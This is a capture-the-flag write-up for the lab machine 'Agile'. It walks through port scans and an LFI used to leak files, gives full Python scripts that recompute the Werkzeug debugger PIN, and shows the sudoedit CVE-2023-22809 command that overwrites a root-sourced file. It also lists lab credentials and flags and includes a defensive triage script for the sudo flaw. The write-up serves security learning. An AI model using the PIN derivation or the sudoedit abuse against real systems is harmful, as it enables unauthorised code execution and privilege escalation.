Overview
This was a very interesting box with a lot of rabbit holes. The initial foothold came from an LFI, which I used to leak the files needed to compute the Werkzeug debugger PIN and unlock its console. The first user's credentials were in the MySQL database, and the second user's came from a Chrome remote-debugging session. Root was obtained by exploiting CVE-2023-22809 in sudoedit.
Name - Agile
Difficulty - Medium
OS - Linux
Points - 30
Information Gathering
Port Scan
Basic Scan
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-12 04:50 EDT
Nmap scan report for 10.10.11.203
Host is up (0.091s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 3.63 seconds
Version Scan
$ nmap 10.10.11.203 -p22,80 -sC -sV
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-12 04:50 EDT
Nmap scan report for 10.10.11.203
Host is up (0.30s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f4:bc:ee:21:d7:1f:1a:a2:65:72:21:2d:5b:a6:f7:00 (ECDSA)
|_ 256 65:c1:48:0d:88:cb:b9:75:a0:2c:a5:e6:37:7e:51:06 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://superpass.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.18 seconds
HTTP Enumeration
Visiting the website (port 80 redirects to superpass.htb, so that name has to resolve to the box) gives us the following password-vault app.
There are register and login options. I registered a test user and logged in with it.
We can add passwords to the vault and export the vault. I found an LFI in the following request:
Also, if we pass an invalid parameter, the app throws an exception and returns the Werkzeug debug page, so the Flask app is running with debug mode enabled.
The interactive console on that page is locked behind a PIN. Werkzeug derives the PIN deterministically from a handful of server-side values: the username the app runs as, the module and callable names of the WSGI app, the path of flask/app.py, the MAC address of the primary interface (uuid.getnode(), as a decimal integer), and /etc/machine-id with the process's cgroup name appended. All of these can be read through the LFI, so after collecting them I recomputed the PIN with the following script:
#!/usr/bin/env python3
# Recompute the Werkzeug debugger PIN from values leaked through the LFI.
# Mirrors werkzeug.debug.get_pin_and_cookie_name(); every value below was
# read from the target.
import hashlib
from itertools import chain

probably_public_bits = [
    'www-data',  # username the Flask process runs as (getpass.getuser())
    'flask.app',  # modname
    'wsgi_app',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/app/venv/lib/python3.10/site-packages/flask/app.py',  # getattr(mod, '__file__', None)
]
private_bits = [
    '345052384868',  # str(uuid.getnode()): /sys/class/net/ens33/address as a decimal integer
    'ed5b159560f54721827644bc9b220d00superpass.service',  # get_machine_id(): /etc/machine-id + cgroup name from /proc/self/cgroup
]

h = hashlib.sha1()  # newer versions of Werkzeug use SHA-1 instead of MD5
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]

h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
for group_size in 5, 4, 3:
    if len(num) % group_size == 0:
        rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                      for x in range(0, len(num), group_size))
        break
else:
    rv = num
print("Pin: " + rv)
The script gives 110-709-587. After entering that PIN, the console unlocked and I could run Python, and through it shell commands, from there.
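As an added example (not the write-up's script), here is the same derivation written as reusable functions: it rebuilds the private bits from the raw leaked file contents instead of hard-coding them, and can hash with SHA-1 (current Werkzeug) or MD5 (older releases). The file contents below are constructed to match the values used above; the interface name ens33 and the exact cgroup line are assumptions.

```python
#!/usr/bin/env python3
"""Derive the Werkzeug debugger PIN from files leaked through an LFI.

Added example, not the write-up's own script. Rebuilds the private bits
from raw file contents and supports both hash algorithms Werkzeug has used.
"""
import hashlib
import re
from itertools import chain

# Constructed stand-ins for the files read via the LFI (values from the box).
LEAK_MAC_ADDRESS = "00:50:56:b9:8e:64\n"                  # /sys/class/net/ens33/address (iface assumed)
LEAK_MACHINE_ID = "ed5b159560f54721827644bc9b220d00\n"   # /etc/machine-id
LEAK_CGROUP = "0::/system.slice/superpass.service\n"      # first line of /proc/self/cgroup (assumed)


def mac_to_node(mac_text: str) -> str:
    """uuid.getnode() returns the MAC as an integer; Werkzeug hashes str() of it."""
    hexstr = re.sub(r"[^0-9a-fA-F]", "", mac_text)
    if len(hexstr) != 12:
        raise ValueError("expected a 48-bit MAC address")
    return str(int(hexstr, 16))


def machine_id_from_leaks(machine_id_text: str, cgroup_text: str) -> str:
    """Mirror werkzeug.debug.get_machine_id(): /etc/machine-id (or boot_id)
    with the last path component of the first /proc/self/cgroup line appended."""
    mid = machine_id_text.strip()
    first = cgroup_text.splitlines()[0].strip() if cgroup_text.strip() else ""
    return mid + first.rpartition("/")[2]


def werkzeug_pin(username, modname, appname, flask_app_path, node, machine_id, algo="sha1"):
    """Re-implementation of the hashing in werkzeug.debug.get_pin_and_cookie_name().
    algo is "sha1" for current Werkzeug, "md5" for older releases. Returns (pin, cookie_name)."""
    probably_public_bits = [username, modname, appname, flask_app_path]
    private_bits = [node, machine_id]
    h = hashlib.new(algo)
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode("utf-8")
        h.update(bit)
    h.update(b"cookiesalt")
    cookie_name = "__wzd" + h.hexdigest()[:20]
    h.update(b"pinsalt")
    num = ("%09d" % int(h.hexdigest(), 16))[:9]
    for group_size in (5, 4, 3):
        if len(num) % group_size == 0:
            pin = "-".join(num[x:x + group_size].rjust(group_size, "0")
                           for x in range(0, len(num), group_size))
            break
    else:
        pin = num
    return pin, cookie_name


def pin_for_agile(algo="sha1"):
    """Feed the leaked values from the box through the derivation."""
    return werkzeug_pin(
        "www-data",                                             # getpass.getuser() of the Flask process
        "flask.app",                                            # module of the WSGI callable
        "wsgi_app",                                             # __name__ of app.wsgi_app in Flask 2.2+
        "/app/venv/lib/python3.10/site-packages/flask/app.py",  # flask.app.__file__
        mac_to_node(LEAK_MAC_ADDRESS),
        machine_id_from_leaks(LEAK_MACHINE_ID, LEAK_CGROUP),
        algo=algo,
    )


if __name__ == "__main__":
    for algo in ("sha1", "md5"):
        pin, cookie = pin_for_agile(algo)
        print(f"{algo}: pin={pin} cookie={cookie}")
```

On a real target read /sys/class/net/<iface>/address, /etc/machine-id (or /proc/sys/kernel/random/boot_id when machine-id is absent) and the first line of /proc/self/cgroup through the LFI; because the LFI is served by the Flask process itself, /proc/self there is the right process. For the values above the write-up reports 110-709-587.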
Getting User.txt
I used the console to spawn a reverse shell.
The MySQL credentials were in the application's config under /app:
Mysql Creds - superpassuser:dSA6l7q*yIVs$39Ml6ywvgK
With those credentials I logged into MySQL and found more credentials in the stored vault entries.
Of those, this pair worked as a system login: corum:5db7caa1d13cc37c9fc2
Then I got the user flag from corum's home directory.
User Flag - 6d3d0e7906171b800a450d3640c8987e
Getting root.txt
There is also a dev/test copy of the site.
And a Chrome remote-debugging port is listening on 41829.
From Chrome it can be reached through chrome://inspect; inspecting that session gave me the credentials.
Creds - edwards:d07867c6267dcb5df0af
From that user, rooting was fairly easy.
edwards@agile:~$ sudo -l
Matching Defaults entries for edwards on agile:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User edwards may run the following commands on agile:
(dev_admin : dev_admin) sudoedit /app/config_test.json
(dev_admin : dev_admin) sudoedit /app/app-testing/tests/functional/creds.txt
edwards@agile:~$
So edwards can edit two files as dev_admin via sudoedit. But CVE-2023-22809 (sudo 1.8.0 through 1.9.12p1) lets a user with a sudoedit rule read and write other files owned or writable by the target user: sudoedit builds the editor command line from SUDO_EDITOR/VISUAL/EDITOR, and a "--" inside that variable makes it treat whatever follows as an additional file to edit, without checking that file against the sudoers policy.
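As an added example (not part of the write-up), the following Python triage helper checks a host for the conditions this abuse needs and shows the sudoers change the sudo advisory recommends as a workaround next to a vulnerable grant. It assumes the affected range 1.8.0 through 1.9.12p1 and the advisory's env_delete workaround; the sudoers texts are constructed to reproduce the sudo -l output above. Distributions backport the fix without changing the version string, so on Ubuntu and friends the version check is only a hint and the package changelog is authoritative.

```python
#!/usr/bin/env python3
"""Triage check for CVE-2023-22809 exposure from sudo's version and sudoers.

Added example, not from the write-up. Assumptions: sudo 1.8.0 through
1.9.12p1 is the affected range and the vendor workaround is
    Defaults!SUDOEDIT env_delete+="SUDO_EDITOR VISUAL EDITOR"
applied to a Cmnd_Alias covering the sudoedit entries (both from the sudo
advisory). Sample inputs below are constructed.
"""
import re

AFFECTED_FROM = (1, 8, 0, 0)   # 1.8.0
FIXED_IN = (1, 9, 12, 2)       # 1.9.12p2

# Constructed: the box's sudo -l grant written as sudoers lines.
VULNERABLE_SUDOERS = """\
Defaults env_reset, mail_badpass, use_pty
edwards ALL=(dev_admin:dev_admin) sudoedit /app/config_test.json, \\
    sudoedit /app/app-testing/tests/functional/creds.txt
"""

# Constructed: the same grant with the advisory's workaround applied.
HARDENED_SUDOERS = """\
Defaults env_reset, mail_badpass, use_pty
Cmnd_Alias SUDOEDIT = sudoedit /app/config_test.json, \\
    sudoedit /app/app-testing/tests/functional/creds.txt
Defaults!SUDOEDIT env_delete+="SUDO_EDITOR VISUAL EDITOR"
edwards ALL=(dev_admin:dev_admin) SUDOEDIT
"""

EDITOR_VARS = {"SUDO_EDITOR", "VISUAL", "EDITOR"}


def logical_lines(sudoers: str):
    """Join backslash-continued lines and drop comments, as sudoers does
    (simplification: a '#' inside quotes is treated as a comment too)."""
    buf = ""
    for raw in sudoers.splitlines():
        line = raw.rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        line, buf = buf.strip(), ""
        line = line.split("#", 1)[0].strip()
        if line:
            yield line


def parse_sudo_version(text: str):
    """Parse 'Sudo version 1.9.12p1' (first line of sudo -V) into a comparable tuple."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        raise ValueError("no sudo version found")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def version_affected(v) -> bool:
    """Upstream range only; distro backports make this a hint, not a verdict."""
    return AFFECTED_FROM <= tuple(v) < FIXED_IN


def sudoedit_grants(sudoers: str):
    """User specs and command aliases that hand out sudoedit."""
    return [l for l in logical_lines(sudoers)
            if not l.startswith("Defaults") and re.search(r"\bsudoedit\b", l)]


def editor_vars_deleted(sudoers: str) -> bool:
    """True if a Defaults line strips all three editor variables.
    Simplification: does not verify that a Defaults!ALIAS actually covers
    every sudoedit entry, only that the workaround line is present."""
    pat = re.compile(r'^Defaults(?:!\S+)?\s+env_delete\s*\+=\s*"([^"]*)"')
    for l in logical_lines(sudoers):
        m = pat.match(l)
        if m and EDITOR_VARS <= set(m.group(1).split()):
            return True
    return False


def exposed(version_text: str, sudoers: str) -> bool:
    """Exploitable-looking host: affected version, a sudoedit grant, no workaround."""
    return (version_affected(parse_sudo_version(version_text))
            and bool(sudoedit_grants(sudoers))
            and not editor_vars_deleted(sudoers))


if __name__ == "__main__":
    ver = "Sudo version 1.9.12p1"  # constructed; take it from sudo -V on a real host
    for name, text in (("vulnerable", VULNERABLE_SUDOERS), ("hardened", HARDENED_SUDOERS)):
        print(f"{name}: exposed={exposed(ver, text)}")
```

The hardened variant is the advisory's workaround: sudoedit still only opens the files listed in the alias, but the editor variables are removed from the environment for those commands, so there is no "--" for sudoedit to honour. Patching to 1.9.12p2 or the distro's backported build removes the root cause.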
So, which file to write? I ran pspy to look for cron jobs and found that root sources /app/venv/bin/activate every minute, and that file is group-writable by dev_admin:
edwards@agile:/app/app-testing$ ls -al /app/venv/bin/activate
-rw-rw-r-- 1 root dev_admin 1976 Jul 12 14:06 /app/venv/bin/activate
So I opened the file through CVE-2023-22809 (the real target goes after the "--" in EDITOR; the permitted file is only there to satisfy sudoers) and appended a simple payload:
EDITOR='vim -- /app/venv/bin/activate' sudoedit -u dev_admin /app/config_test.json
After a minute the cron job ran my payload as root and left me the setuid file, which I used to become root.
Finally, I grabbed the root flag.
Root Flag - f7ad677bce5fdd00982dfd8dc8edb0ab
Flags
user.txt - 6d3d0e7906171b800a450d3640c8987e
root.txt - f7ad677bce5fdd00982dfd8dc8edb0ab